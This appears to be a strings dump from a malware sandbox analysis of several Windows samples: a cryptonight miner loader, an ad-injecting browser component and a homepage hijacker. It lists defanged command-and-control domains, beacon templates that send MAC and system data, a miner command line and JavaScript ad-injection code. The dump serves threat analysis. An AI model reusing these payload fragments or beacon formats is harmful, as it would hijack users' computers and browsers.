`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
operator
operator
GetProcessWindowStation
GetProcessWindowStation
tongji.wangbax.cn
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
VVV.3322.org
VVV.3322.org
9ACDDBD0-4236-4127-CCCC-B00F6AA7AB33
9ACDDBD0-4236-4127-CCCC-B00F6AA7AB33
00:00:00:00:00:00
00:00:00:00:00:00
X:X:X:X:X:X
X:X:X:X:X:X
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003 R2
M-d-d%s
M-d-d%s
127.0.0.1
127.0.0.1
awangba.com
awangba.com
pw=%s&id=%s&user=%s&type=%s&mac=%s&cpun=%d&cpux=%d&sysinfo=%s&ip=%s&worker=%d
pw=%s&id=%s&user=%s&type=%s&mac=%s&cpun=%d&cpux=%d&sysinfo=%s&ip=%s&worker=%d
taskmgr.exe
taskmgr.exe
mssrv.exe
mssrv.exe
%s -a cryptonight -o %s -u %s -p x -t %d
%s -a cryptonight -o %s -u %s -p x -t %d
hXXp://tongji.wangbax.cn/eda/cpuConfig
hXXp://tongji.wangbax.cn/eda/cpuConfig
apluscpuconfig.ini
apluscpuconfig.ini
%s_%s
%s_%s
getEdaAddress.awangba.com
getEdaAddress.awangba.com
type=cpu&version=cpu1.0&user=%s&son=%s&pw=%s&osbit=%d&client=1.0.0
type=cpu&version=cpu1.0&user=%s&son=%s&pw=%s&osbit=%d&client=1.0.0
Z:\svn\trunk\Develop\CPUClient\Win32\Release\BootKit32.pdb
Z:\svn\trunk\Develop\CPUClient\Win32\Release\BootKit32.pdb
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegOpenKeyA
RegOpenKeyA
RegEnumKeyExA
RegEnumKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
WININET.dll
WININET.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
PSAPI.DLL
PSAPI.DLL
IPHLPAPI.DLL
IPHLPAPI.DLL
GetCPInfo
GetCPInfo
.?AVCMd5@@
.?AVCMd5@@
37.57.16.189
37.57.16.189
zcÃ
zcÃ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe
2=3
2=3
? ?$?,?@?`?|?
? ?$?,?@?`?|?
mscoree.dll
mscoree.dll
nKERNEL32.DLL
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
1.112.1.11111
1.112.1.11111
BootKit.exe
BootKit.exe
1.0.0.9
1.0.0.9
FC.exe_1516:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
operator
operator
GetProcessWindowStation
GetProcessWindowStation
M-d-d%s
M-d-d%s
awangba.com
awangba.com
Z:\svn\trunk\Develop\yxjgg\Release\slyxj.pdb
Z:\svn\trunk\Develop\yxjgg\Release\slyxj.pdb
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyW
RegOpenKeyW
RegEnumKeyExW
RegEnumKeyExW
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
HttpOpenRequestW
HttpOpenRequestW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpSendRequestW
HttpSendRequestW
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
URLDownloadToFileW
URLDownloadToFileW
urlmon.dll
urlmon.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
GetCPInfo
GetCPInfo
.?AVCMd5@@
.?AVCMd5@@
11D1j1
11D1j1
1,2
1,2
3 3$3(3|3
3 3$3(3|3
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
tongji.wangbax.cn
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
X:X:X:X:X:X
X:X:X:X:X:X
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
/client/yxjKey?user=
/client/yxjKey?user=
/client/dbKey?user=
/client/dbKey?user=
yxj.config
yxj.config
hXXp://domain.awangba.com.cn/yxj/config.xml
hXXp://domain.awangba.com.cn/yxj/config.xml
if (!document.body) return setTimeout(arguments.callee, 50);
if (!document.body) return setTimeout(arguments.callee, 50);
var adpro= document.createElement('script');
var adpro= document.createElement('script');
adpro.type = 'text/javascript';
adpro.type = 'text/javascript';
adpro.text = '_adpro_pub= "
adpro.text = '_adpro_pub= "
adpro.text = '_adpro_slot= "
adpro.text = '_adpro_slot= "
document.body.insertBefore(adpro, document.body.children.item(0));
document.body.insertBefore(adpro, document.body.children.item(0));
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
adpro.src = 'hXXp://tz.awangba.com.cn/a.js';
adpro.src = 'hXXp://tz.awangba.com.cn/a.js';
var yxj= document.createElement('div');
var yxj= document.createElement('div');
yxj.id='yxjgg';
yxj.id='yxjgg';
document.body.appendChild(yxj);
document.body.appendChild(yxj);
id=%s&mac=%s&type=%s&user=%s&pw=%s
id=%s&mac=%s&type=%s&user=%s&pw=%s
192.168.
192.168.
.baidu.com
.baidu.com
.hao123.com
.hao123.com
.google.com
.google.com
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe
1.0.0.1
1.0.0.1
1.141.1.3021
1.141.1.3021
mp.exe_1552:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
operator
operator
GetProcessWindowStation
GetProcessWindowStation
Z:\mysvn\trunk\NewMainPage\Release\NewMainPage.pdb
Z:\mysvn\trunk\NewMainPage\Release\NewMainPage.pdb
KERNEL32.dll
KERNEL32.dll
EnumChildWindows
EnumChildWindows
MapVirtualKeyW
MapVirtualKeyW
keybd_event
keybd_event
USER32.dll
USER32.dll
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
URLDownloadToFileW
URLDownloadToFileW
urlmon.dll
urlmon.dll
GetCPInfo
GetCPInfo
1*2024282
1*2024282
5 5$5(5,5054585
5 5$5(5,5054585
AKERNEL32.DLL
AKERNEL32.DLL
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
ntdll.dll
ntdll.dll
kernel32.dll
kernel32.dll
OLEACC.DLL
OLEACC.DLL
mp.ini
mp.ini
hXXp://domain.awangba.com.cn/mp/mp.ini
hXXp://domain.awangba.com.cn/mp/mp.ini
hXXp://123.sogou.com/?71090-1234
hXXp://123.sogou.com/?71090-1234
hXXp://123.sogou.com/?71049-
hXXp://123.sogou.com/?71049-
hXXp://123.sogou.com/?71090-
hXXp://123.sogou.com/?71090-
hXXp://VVV.duba.com/?un_367393_
hXXp://VVV.duba.com/?un_367393_
hXXp://VVV.sogou.com/index.htm?pid=sogou-netb-38181d991caac98b-
hXXp://VVV.sogou.com/index.htm?pid=sogou-netb-38181d991caac98b-
lockmp.dll
lockmp.dll
explorer.exe
explorer.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe
1.0.0.1
1.0.0.1
1.119.1.3171
1.119.1.3171
300084.exe_256:
.text
.text
`.rdata
`.rdata
@.data
@.data
.aspack
.aspack
.adata
.adata
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
MFC42.DLL
MFC42.DLL
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegCreateKeyA
RegCreateKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
MSVCP60.dll
MSVCP60.dll
iphlpapi.dll
iphlpapi.dll
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
.\config.ini
.\config.ini
%s\config.ini
%s\config.ini
iexplore.exe
iexplore.exe
.PAVCInternetException@@
.PAVCInternetException@@
1.1.3
1.1.3
%s%s%s
%s%s%s
255.255.255.255
255.255.255.255
%s?%u
%s?%u
%s.crc?%u
%s.crc?%u
"%s" %s
"%s" %s
%s\%s
%s\%s
main.exe
main.exe
%s\run.ini
%s\run.ini
X:X:X:X:X:X
X:X:X:X:X:X
center.pcdogs.info
center.pcdogs.info
center.boxlist.info
center.boxlist.info
center.oldlist.info
center.oldlist.info
X%sX%sX%sX%sX%sX
X%sX%sX%sX%sX%sX
kernel32.dll
kernel32.dll
user32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
mfc42.dll
mfc42.dll
msvcrt.dll
msvcrt.dll
advapi32.dll
advapi32.dll
shell32.dll
shell32.dll
msvcp60.dll
msvcp60.dll
wininet.dll
wininet.dll
ws2_32.dll
ws2_32.dll
300084.exe_256_rwx_00410000_00003000:
kernel32.dll
kernel32.dll
user32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
mfc42.dll
mfc42.dll
msvcrt.dll
msvcrt.dll
advapi32.dll
advapi32.dll
shell32.dll
shell32.dll
msvcp60.dll
msvcp60.dll
iphlpapi.dll
iphlpapi.dll
wininet.dll
wininet.dll
ws2_32.dll
ws2_32.dll
RegCloseKey
RegCloseKey
InternetCrackUrlA
InternetCrackUrlA